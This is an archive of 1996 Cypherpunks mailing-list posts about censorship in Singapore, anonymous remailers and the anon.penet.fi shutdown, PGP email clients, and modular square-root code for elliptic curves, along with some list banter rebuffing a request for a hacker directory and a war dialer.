tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 1 Sep 1996 06:52:02 +0800
To: qut@netcom.com (Dave Harman OBC)
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608311831.LAA23860@netcom21.netcom.com>
Message-ID: <199608312040.PAA20696@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dave Harman OBC wrote:
> ! > Agreed, the DNS and other systems should be upgraded to 8bit.
> ! > Unix should also allow / in file names, it can be escaped somehow.
> ! 
> ! It is not possible.
> 
> Oh, every value can be escaped, there's no reason that the full 8bit 
> range cannot be incorporated throughout every operating system.  It's 
> just legacy junk which keeps us putting up restrictions in everything 
> that we really don't want.  Ditto for network software.
> 

It is not possible because all old programs will be broken.

It is also not possible because non-ascii characters have different
meanings in different languages. I mean, words 

ðÏÌÀÂÉÌÁ ÐÁÒÎÑ Ñ,
ïËÁÚÁÌÓÑ ÂÅÚ ÈÕÑ.
îÁ ÈÕÑ ÍÎÅ ÂÅÚ ÈÕÑ, 
ëÏÇÄÁ Ó ÈÕÅÍ ÄÏ ÈÕÑ?

have meaning only to Russian speakers. A German or a Japanese would
never be able to remember a hostname like 
ÄÉÒÅËÃÉÑ.ÍÁÛÚÁ×ÏÄ.ÓÁÒÁÔÏ×.ÒÏÓÓÉÑ,
because in _their_ representation of these characters this text is a 
complete gibberish.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sun, 1 Sep 1996 09:33:59 +0800
To: cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <199608312341.QAA09753@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 AM 8/31/96 -0700, tcmay@got.net (Timothy C. May) wrote:
>The point is to make clear to them that the Usenet and similar Web sites
>are global in nature, not subject to censorship without a very high local
>cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then
>Singaporans will have to choose not to carry the various newsgroups into
>which *I* post such messages! 
[.....]
>To be blunt, if Singapore wants to stop me from discussing the dictator Yew
>and his feeble son, they can't.  Except by pulling the plugs on forums in
>which my posts are carried. 

Or they'll have to implement per-article filtering, whether done by
bots (easy to evade) or by humans (normally much harder.)
It's easy to have bots get rid of all postings/email/web mentioning
Tim May or Klaus von Future Prime, though tougher to do so if
you start posting anti-government-slander from your various Tentacles.

And they don't have to use humans to filter the whole web - 
have bots identify any material containing the words "Singapore" or "Yew"
and forward it to the humans, though that makes web proxies a bit slow :-)

Reuters reports:
R>Contents deemed objectionable include those ``which tend to  
R>bring the government into hatred or contempt, or which excite 
R>disaffection against the government,'' an SBA statement said

Disaffection?  Everybody loves Lee Kwan Yew (or else) -
he's like a Big Brother to us!


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pomp pood thai <torment@goodnet.com>
Date: Sun, 1 Sep 1996 09:41:52 +0800
To: patrick b cummings <cypherpunks@toad.com
Subject: Got to be kidding right?
Message-ID: <Pine.SOL.3.91.960831165106.28166A@goodguy>
MIME-Version: 1.0
Content-Type: text/plain



At 06:54 PM 8/31/96 EDT, patrick b cummings wrote:
>I am planning to make a list of hacker's of america and would appreciate
>it for your help.  please send me your 
>    handle
>    e-mail address
>    city, state
>    (optional) your mailing address 
>    and url
>    whether or not you would like to recieve hackers list
>    type of hacking you do
>Thank You for your cooperation

                               $   $
      See ya soon...              $$     $$
                                 $$       $$          |
                           $    $$$oo    oo$$         X
                           $    X^^'$$$$$$^^'$      | X |
                        $ $$$ $ XXX^^^$$^^^$$$      X X X
                        ``$$$'' XX^^^'$$'^^^$$      X%X%X
                          $$$$o  XXo      o$$       o X
                           $$$$$$ $$$    $$$  oOo o$$$$^
                            `$$$$$$ $$oo$$ o$$$$$$$'^$$^
                             $$$$$$$ $$$$ $$$$$$$^    X
                               $$$$$$ $$ $$$$$ ^      X
                                $$$$$$oo$$$$          X
                                $$$$$$$$$$^           X
                              o$$$$$$$$$$^            X
                            o$$$$$$$$$^^              X
                           ^$$$$$$$^                  X
                             $$$$$$o                  |
                              ``$$$4$$
                                 ``$$$
                                    $               
Tormentia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Sun, 1 Sep 1996 09:52:18 +0800
Subject: Re: Below-bit-level encoding
In-Reply-To: <9608312103.AA11724@castles.com>
Message-ID: <199609010005.RAA04542@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! how the hell do i get off this list?

We won't let you go until you contribute as much hacking tips as you've 
learned.  Sorry, buddy.

Perhaps you can start by giving us some bit programming techniques.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 1 Sep 1996 09:59:27 +0800
To: cypherpunks@toad.com
Subject: Mail OnNet
Message-ID: <199609010014.RAA03254@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


In my never-ending search for the perfect PGP e-mail client, I just stumbled on to a beta of a product put out by FTP Software called Mail OnNet.  Unlike the Pronto Secure and Pegasus, this client actually has PGP code (licensed from PGP Inc.) built directly in.  No shelling out to DOS!

Very nice interface and almost complete idiot-proof encrypting/decrypting/signing.  Extremely powerful rules based processing too.

Check out:

http://www.ftp.com/mkt_info/onnet32/try.htm

IMHO, this is getting very close to transparent secure e-mail for the masses.

Joel

Two notes.  (1) It only runs under Win95 and NT.  (2) It's ITAR restricted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frogfarm@yakko.cs.wmich.edu (Damaged Justice)
Date: Sun, 1 Sep 1996 07:43:52 +0800
To: cypherpunks@toad.com
Subject: SNAKEOIL? Top Secret for Windows
Message-ID: <199608312153.RAA16444@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: sk510019@mail.idt.net (Siva Krishna)
Newsgroups: comp.archives.ms-windows.announce
Subject: tsecret.zip - TOPSECRET!: Easily encrypts any file.
Message-ID: <9608312039.cg4898@Simtel.Net>
Date: Sat, 31 Aug 1996 20:39:29 GMT

I have uploaded to Simtel.Net:

http://www.simtel.net/pub/simtelnet/win3/security/tsecret.zip
ftp://ftp.simtel.net/pub/simtelnet/win3/security/tsecret.zip     12070 bytes

tsecret.zip     TOPSECRET!: Easily encrypts any file

TOPSECRET is a program to encrypt your sensitive files.  This program
does not use the RSA standard (which is restricted for export).  This
program uses the aid of a "Catalyst" file (which can be any file) to
encrypt another file (any file).  The Catalyst acts as a key to code and
decode your sensitive files.  Of course you can even make your own
catalyst by encrypting one file with another.  A periodically changing
Catalyst can be made by combining 1-Registered mail file 2-Courier file
3-Last message file; This would ensure high security for the transmission
of your sensitive files.I am sure you will come up with your own methods.

Shareware.  Uploaded by the author.

Siva Krishna
sk510019@mail.idt.net

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
 EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
        All generalizations are false, with the exception of this one
 I feel a groove comin' on |            $           | Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Sun, 1 Sep 1996 08:05:13 +0800
To: jimbell@pacifier.com
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
In-Reply-To: <199608270304.UAA07482@mail.pacifier.com>
Message-ID: <19960830.170609.9758.0.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


jimbell,
I agree with what you are saying but not all polititions are that bad. 
You make it sound as if their are no politisions are for freedom of the
net.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Koum <jkoum@leland.Stanford.EDU>
Date: Sun, 1 Sep 1996 11:25:39 +0800
To: Synthesizer Punk <lucas@wasteland.org>
Subject: Re: BoS: Re: your mail
In-Reply-To: <Pine.LNX.3.95.960901192944.6602A-100000@wrath.netline.net>
Message-ID: <Pine.SUN.3.95.960831181450.8212D-100000@elaine37.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



	Well, I think we all seen and heard what type of people use
phrases like: "Thank You for your cooperation". 

On Sun, 1 Sep 1996, Synthesizer Punk wrote:

> On Sat, 31 Aug 1996, patrick b cummings wrote:
> 
> :I am planning to make a list of hacker's of america and would appreciate
> :it for your help.  please send me your 
> :    handle
> :    e-mail address
> :    city, state
> :    (optional) your mailing address 
> :    and url
> :    whether or not you would like to recieve hackers list
> :    type of hacking you do
> :Thank You for your cooperation
> :
> :
> :
> 	May I ask, ill fatedly, WHY you're doing this?
> 	What goals you wish to accomplish by doing this?
> 	How many friends will you make?
> 	Will you go to Disney World when done?
> 
> 	sigh
> 
>                       __  .__https://aleph.tessier.com__   lucas@wasteland.org
>   _________.__. _____/  |_|  |__ ______  __ __  ____ |  | __   If privay is 
>  /  ___<   |  |/    \   __\  |  \\____ \|  |  \/    \|  |/ /  outlawed, only
>  \___ \ \___  |   |  \  | |   Y  \  |_> >  |  /   |  \    <    outlaws will
> /____  >/ ____|___|  /__| |___|  /   __/|____/|___|  /__|_ >   have privacy.
>      \/ \/ sXe sXe \/          \/|__| figlet       \/just Another P.C. Fascist
>            Tessier/Ashpool_-//-..()_=+www(ashpool/tessier).com.-+|\
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Sun, 1 Sep 1996 08:50:18 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19960830.174816.9758.3.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I am planning to make a list of hacker's of america and would appreciate
it for your help.  please send me your 
    handle
    e-mail address
    city, state
    (optional) your mailing address 
    and url
    whether or not you would like to recieve hackers list
    type of hacking you do
Thank You for your cooperation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Sun, 1 Sep 1996 08:58:28 +0800
To: best-of-security@suburbia.net
Subject: "Douglas R. Floyd" <dfloyd@io.com>: Re: File System Encryption
Message-ID: <19960830.175522.9758.4.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


--------- Begin forwarded message ----------
From: "Douglas R. Floyd" <dfloyd@io.com>
To: drifter@c2.net (Drifter)
Cc: cypherpunks@toad.com
Subject: Re: File System Encryption
Date: Tue, 27 Aug 1996 09:01:03 -0500 (CDT)
Message-ID: <199608271401.JAA04116@xanadu.io.com>

> 
> I'm aware of the three main disk encryption programs SFS, SECDRV, and
> SECDEV, but I need to find a solution that works with Windows 95 32bit
> or Windows NT 4.0.
> 
> I'm currently using SFS 1.17 and Secure Drive under Win-95, but am
> unable to continue to work in dos compatability mode due to severe
> performance hits.  I am open to commercial products that have passed
> peer review, but know of none.
> 
> If anyone could suggest a solution (outside of switching OS's), I
> would be *most* gratefull.
> 
> Please respond to the list, as I am a subscriber under another
> account.

If you have another 386 or 486 lying around, you could install Linux and
Ian's encrypted loopback code on a remote box, then NFS or Samba the
filesystem over.  For protection, you could modify the vlock command to
lock the console (and not unlock it), and disable inetd.  Then, unless
someone has the permissions to access the files through the network, the
files are inaccessable ;-).

> 
> The Drifter
> 


--------- End forwarded message ----------
You could find some programers on the net and make a new one that is
windows 95 compatible.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Jackiewicz <invalid@upt.org>
Date: Sun, 1 Sep 1996 12:09:38 +0800
To: patrick b cummings <patrickbc@juno.com>
Subject: Re:
In-Reply-To: <19960830.174816.9758.3.patrickbc@juno.com>
Message-ID: <3228F3AD.7B70E4EA@upt.org>
MIME-Version: 1.0
Content-Type: text/plain


a hackers of america list? 

that would be really stupid and give the wrong impression. while i am a
'hacker', i would rather not be associated with the media definion of a
hacker, and i am sure that this is what your list will be associated
with. either that, or be given to the wrong people..

is there any point to all this?

i apologize for responding to this thread, but it just seems like a
really stupid idea.
-- 
from the superkeen and highly electronic desk of...

	 _ __/|  Tom Jackiewicz
	 \'x.X'  System/Network Security
	 =(___)= Senior Systems Administrator
	     U	 invalid@upt.org, invalid@goodnet.com
				
		...fo ksed cinortcele ylhgih dna neekrepus eht morf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sun, 1 Sep 1996 12:32:06 +0800
To: cypherpunks@toad.com
Subject: Re: Ester Dyson's comment on anonymity
In-Reply-To: <ae4e63ca01021004ac2b@[206.170.115.3]>
Message-ID: <v03007803ae4ea4353d05@[17.219.102.1]>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
>Note Esther Dyson's comments:
>
>         "The damage that can be done by anonymity is far bigger" than in
>   any other medium, said Esther Dyson, chairwoman of the Electronic
>   Frontier Foundation. "In the end, you need to be able to get at
>   somebody's identity to enforce accountability, and the question is how
>   do you also enforce freedom of speech and freedom from prosecution for
>   unpopular opinions."

I wonder whether Esther was speaking about the Federalist Papers?
Who did write those subversive documents anywhy?

Martin Minow
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Douglass <mikedoug@texas.net>
Date: Sun, 1 Sep 1996 10:38:24 +0800
To: pomp pood thai <torment@goodnet.com>
Subject: Re: BoS: Got to be kidding right?
In-Reply-To: <Pine.SOL.3.91.960831165106.28166A@goodguy>
Message-ID: <Pine.GSO.3.94.960831193721.19264C-100000@staff1.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, pomp pood thai wrote:

People, I don't particularily agree with this posting, and I already emailed
the original poster with my thoughts on that subject.  Now, before you reply
to this post, please read the charter. BoS is supposed to be the *BEST* of
security, not the *LONG-DRAWN-OUT-DISCUSSION-OF-SECURITY-ISSUES*.  I
understood that I when I subscribe and I have tried to limit any posting
to strictly security issues, and only those important and not ones starting
threads of conversation.  Read the charter!  (Who's in charge of this
group anyways??  Hope I'm not stepping on toes!)

> At 06:54 PM 8/31/96 EDT, patrick b cummings wrote:
> >I am planning to make a list of hacker's of america and would appreciate
> >it for your help.  please send me your 
> >    handle
> >    e-mail address
> >    city, state
> >    (optional) your mailing address 
> >    and url
> >    whether or not you would like to recieve hackers list
> >    type of hacking you do
> >Thank You for your cooperation

Michael Douglass
Texas Networking, Inc.

  "To be a saint is to be an exception; to be a true man is the rule.
   Err, fail, sin if you must, but be upright.  To sin as little as
   possible is the law for men; to sin not at all is a dream for angels."

              - Victor Hugo, "Les Miserables"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@chen.com (Mark Chen)
Date: Sun, 1 Sep 1996 12:43:41 +0800
To: weidai@eskimo.com (Wei Dai)
Subject: Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
In-Reply-To: <Pine.SUN.3.95.960829124919.16763B-100000@eskimo.com>
Message-ID: <9609010250.AA00997@pela.chen.com.>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:
> On Thu, 29 Aug 1996, Tom Rollins wrote:
> 
> > Questions are:
> > 
> >   1: How can I take the suqare root mod p ?
> 
> Here's some C++ code for taking modular square roots:
> 
> Integer ModularSquareRoot(const Integer &a, const Integer &p)
> {
> 	if (p%4 == 3)
> 		return a_exp_b_mod_c(a, (p+1)/4, p);
> 
> 	Integer q=p-1;
> 	unsigned int r=0;
> 	while (q%2==0)   // while q is even
> 	{
> 		r++;
> 		q >>= 1;
> 	}
> 
> 	Integer n=2;
> 	while (Jacobi(n, p) != -1)
> 		++n;
> 
> 	Integer y = a_exp_b_mod_c(n, q, p);
> 	Integer x = a_exp_b_mod_c(a, (q-1)/2, p);
> 	Integer b = (x.Square()%p)*a%p;
> 	x = a*x%p;
> 	Integer tempb, t;
> 
> 	while (b != 1)
> 	{
> 		unsigned m=0;
> 		tempb = b;
> 		do
> 		{
> 			m++;
> 			b = b.Square()%p;
> 			if (m==r)
> 				return Integer::ZERO;
> 		}
> 		while (b != 1);
> 
> 		t = y;
> 		for (unsigned i=0; i<r-m-1; i++)
> 			t = t.Square()%p;
> 		y = t.Square()%p;
> 		r = m;
> 		x = x*t%p;
> 		b = tempb*y%p;
> 	}
> 
> 	assert(x.Square()%p == a);
> 	return x;
> }
> 
> >   2: How to determine if a solution exists for a
> >      selected value of x ?
> 
> The Jacobi symbol tells you whether x has a square root mod p:
> 
> // if b is prime, then Jacobi(a, b) returns 0 if a%b==0, 1 if a is
> // quadratic residue mod b, -1 otherwise
> // check a number theory book for what Jacobi symbol means when b is not
> // prime
> 
> int Jacobi(const Integer &aIn, const Integer &bIn)
> {
>     assert(bIn[0]==1);
> 
>     Integer b = bIn, a = aIn%bIn;
>     int result = 1;
> 
>     while (!!a)
>     {
> 	unsigned i=0;
> 	while (a[i]==0)
> 		i++;
> 	a>>=i;
> 
> 	if (i%2==1 && (b%8==3 || b%8==5))
> 		result = -result;
> 
>         if (a%4==3 && b%4==3)
>             result = -result;
> 
>         swap(a, b);
>         a %= b;
>     }
> 
>     return (b==1) ? result : 0;
> }
> 
> >   3: Is the a simpler method than find a square root ?
> 
> I don't think so.  Let me know if you do find one.

If you work in GF(2^m), you can use a normal basis representation
which allows you to do much faster math.  Squaring, for example,
becomes a simple rotation.

There are also very efficient algorithms for computing inverses and
solving quadratics.

These speedups currently account for most of the performance
improvements which elliptic curve systems offer over their
integer-field counterparts.

   - Mark -


--
Mark Chen 
415/341-5539
chen@chen.com
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Sun, 1 Sep 1996 12:32:39 +0800
To: Jan Koum <jkoum@leland.Stanford.EDU>
Subject: Re: BoS: Re: your mail
Message-ID: <199609010258.TAA18705@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Jan Koum wrote:

>	Well, I think we all seen and heard what type of people use
>phrases like: "Thank You for your cooperation". 

Yowsuh! We sho' nuffs be all done seen 'em.

Stanford, hmm?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrickbc@juno.com (patrick b cummings)
Date: Sun, 1 Sep 1996 10:01:30 +0800
To: cypherpunks@toad.com
Subject: wardialer
Message-ID: <19960830.190333.9758.7.patrickbc@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Does any body know where I can get a half decent war dialer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 2 Sep 1996 02:12:03 +0800
To: Johnny Eriksson <paul@fatmans.demon.co.uk
Subject: RE: Desubscribe
Message-ID: <199609011607.JAA22532@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


> > deserves to be shipped to sweden where they shall be 
> > made into cheese by nuns.

At 04:40 PM 9/1/96 DST, Johnny Eriksson wrote:>
> No thanks, we do not want them.

You are Swedish?

I heard on talk.politics.guns somebody say that in Sweden they 
had banned knives with a sharp point at the end, and were going 
to ban sharp knives altogether.  I think he was just engaging in 
hyperbole, that he really meant that gun control in Sweden was 
unreasonably strict, but on reflection I am not sure.

What is the story?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 2 Sep 1996 02:02:55 +0800
To: cypherpunks@toad.com
Subject: Re: anon.penet.fi: URGENT REQUEST
Message-ID: <199609011608.JAA22545@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:09 PM 9/1/96 +0000, paul@fatmans.demon.co.uk wrote:
> I don`t know what the response to this will be, I need approximately 
> 5000 UK pounds to set up such an operation (Yes, a leased line really 
> does cost that much in the UK) and then a monthly income of around 
> 3000 UK pounds.

A little greedy.

Other people have set up a multitude of remailers for substantially less.

We now need remailers, preferably many, many small remailers rather than
one big remailer, that is as easy to reply to as alt.penet.fi, but which
gives substantially better security, that is to say the reply address can 
map to a remailer chain, instead of being constrained to map to a regular
address as the penet.fi remailer did.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jennifer Mansfield-Jones <strix@rust.net>
Date: Sun, 1 Sep 1996 17:51:54 +0800
To: John Deters <jad@dsddhc.com>
Subject: Re: Dr. Vulis is a test, right? [was RE: Desubscribe]
In-Reply-To: <2.2.32.19960830224855.00355560@labg30>
Message-ID: <Pine.LNX.3.91.960831075923.429M-100000@neophron.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


On Fri, 30 Aug 1996, John Deters wrote:
> So, my original question is:  is there really a Dr. Dmitri Vulis (KOTM)
> somewhere?  Or is he just some made-up straw man, created by Tim May, John
> Gilmore and Eric Hughes for their personal amusement, and to add a spot of

There is somebody by this name in the field: the City University of New
York granted a PhD to one Dimitri Vulis in 1995.  The dissertation title
was "Collective encryption: Cryptosystems based on the commutator
collection process for certain free products".  As to whether the
existence of someone with any given name has any bearing on the identity
of any participant in cypherpunks, well, this list has discussed that
general topic before... 

regards,

`=-`=-`=-`=-                                          -='-='-='-='
 Jennifer Mansfield-Jones   http://www.rust.net/~strix/strix.html
 strix@rust.net                            PGP key ------^
          Never try to outstubborn a cat.  (R.A.H.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMijdakxVmNNM34OxAQE98gP9HrRQPCSFYkenAWZB9lriBYu5zA0PCLXs
5Z/3NijVdrT2sHeMawDumYwuk+l9xgIUObmB8c2njGLLrZmZERSyWzbUPI5PRWp2
KvPNA1G1F6SBwedcO9cW342dgwZadpjU5zdxkPvTLDO9cHqNrf5hk8yQp3RlUj3v
iOsef3tQ85s=
=VJmp
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 1 Sep 1996 11:38:50 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Security risks" vs. "credit risks"
In-Reply-To: <ae4e076b0102100432c4@[207.167.93.63]>
Message-ID: <199609010153.UAA22411@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> There is great danger, to be sure, especially if one's writings and public
> utterances become entries into a "threat data base." But I see nothing
> unsurprising in, say, American Airlines expressing more interest in Jim
> Bell or Tim May, both of whom have written publically about terrorism and
> "soft targets," and both of whom have written about how to make pipe bombs,
> than in Marianne Smith, retired school teacher from Peoria.

... bobbit ... 
> 
> Remember, private airlines are just that: private. Surely we do not support
> laws which limit a private airline from using data it has acquired to
> decide whom to pay closer attention to. This is the essence of what
> knowledge is.
> 

Unfortunately, most private businesses suck up to the government. It 
is understandable if we note that they can be harassed by the government.
Airlines, for example, are under tight and rather arbitrary control of 
the FAA.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sun, 1 Sep 1996 13:53:10 +0800
To: patrick b cummings <patrickbc@juno.com>
Subject: Re: wardialer
In-Reply-To: <19960830.190333.9758.7.patrickbc@juno.com>
Message-ID: <Pine.3.89.9608312051.A21374-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996, patrick b cummings wrote:

> Does any body know where I can get a half decent war dialer.
> 

Use a websearch utility, and stop posting to cryptography-based mailing 
lists.

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 1 Sep 1996 13:58:21 +0800
To: "cypherpunks@toad.com>
Subject: Re: (null)
Message-ID: <19960901040353468.AAA172@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996 18:54:29 EDT, patrick b cummings wrote:

>I am planning to make a list of hacker's of america and would appreciate
>it for your help.  please send me your 
>    handle
3VIL HACK3R
>    e-mail address
hacker@stupid.troll.com
>    city, state
>    (optional) your mailing address 
<G> Paranoia lives deep. I wouldn't count on many addresses from real hackers.
>    and url
http://www.stupid.troll.com/HACK3RZ/k00d_d00d.html
>    whether or not you would like to recieve hackers list
No.
>    type of hacking you do
Dismembering people who post off topic? <g>
>Thank You for your cooperation


- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 1 Sep 1996 14:27:58 +0800
To: "loki@infonex.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <19960901041425937.AAA191@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996 14:54:37 -0700, Lance Cottrell wrote:

>>Note Esther Dyson's comments:
>>   "The damage that can be done by anonymity is far bigger" than in
>>   any other medium, said Esther Dyson, chairwoman of the Electronic
>>   Frontier Foundation. "In the end, you need to be able to get at
>>   somebody's identity to enforce accountability, and the question is how
>>   do you also enforce freedom of speech and freedom from prosecution for
>>   unpopular opinions."
<SNIP>

>Is this the official EFF position on remailers? This strong anti-remailer
>position needs to be retracted or widely publicized.

I doubt they'd publicize it; it'd probably cost them a *lot* of supporters.


- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 1 Sep 1996 07:29:25 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: FC: The end of an era: anon.penet.fi shutdown, Stockholm conf
Message-ID: <199608312127.PAA16191@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: Declan McCullagh <declan@eff.org>
              Cypherpunks <cypherpunks@toad.com>

= The shutdown of anon.penet.fi marks an end of an era -- and perhaps it was 
= inevitable.  [--snip--]
= But the closure isn't a permanent loss to the Net. The concept behind 
= deploying anonymous remailers is that [--snip--]
= ...they're temporary and expendable -- if one government attacks a 
= remailer, another appears in another jurisdiction. [--snip--] it was
= time for Helsingus' remailer to go offline. It had served its purpose.  
= 

    Declan:

        I think you are missing the most import service that 
    Johan Helsingius provided:  a means of anonymous corres-
    pondence with services for victims of child abuse, domestic
    violence, alcholism, etc.  *** people who needed to reach
    out to someone ***

        I fully subscribe to the Cypherpunk remailers, particu-
    lary MixMaster and Middleman, but they do not serve this
    purpose.  

        However, maybe as part of social responsibility, we 
    should provide one or more remailers with databases --and 
    EXCLUDE addressing except to the help lines.  and, of 
    course, make it easy enough for the victims to request 
    additional addresses.

        yes, it may take a little effort to upgrade the target
    addresses, etc. but it should be done.

        noone knows what the courts will rule on any matter of
    privacy with Bubba at the helm, but correspondence to 
    shelters and the like has been adjudicated off-limits to 
    FOI, etc.

        I will speak to several ISPs, and if one of them will 
    permit me to accept the "responsibility,"   I will initiate
    one. I have no problem defending it legally.

        attila
          


--
Now, with a black jack mule you wish to harness, you walk up,
look him in the eye, and hit him with a 2X4 over the left eye.  
If he blinks, hit him over the right eye! He'll cooperate 
    --so will politicians.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Sun, 1 Sep 1996 14:04:14 +0800
To: "patrickbc@juno.com>
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
Message-ID: <19960901042711375.AAA140@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 31 Aug 1996 18:11:52 EDT, patrick b cummings wrote:

>I agree with what you are saying but not all polititions are that bad. 
>You make it sound as if their are no politisions are for freedom of the
>net.

For the most part there aren't.  Why? Well the media has sensationalized it. 
How many politicians want to go on record as "protecting the rights of
child-pornographers"?  Now, this isn't a major portion of Internet usage, but
you'd never know that from what you read in the paper.  If you only listened to
them, it'd be something like this:
40% kiddie-porn
20% terrorists, bomb instructions, etc.
15% "evil hackers" who are going to steal our money, shut off our power, etc.
10% hate groups
10% pornography
03% right-wing gun nuts
02% other (research, entertainment, etc)


- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
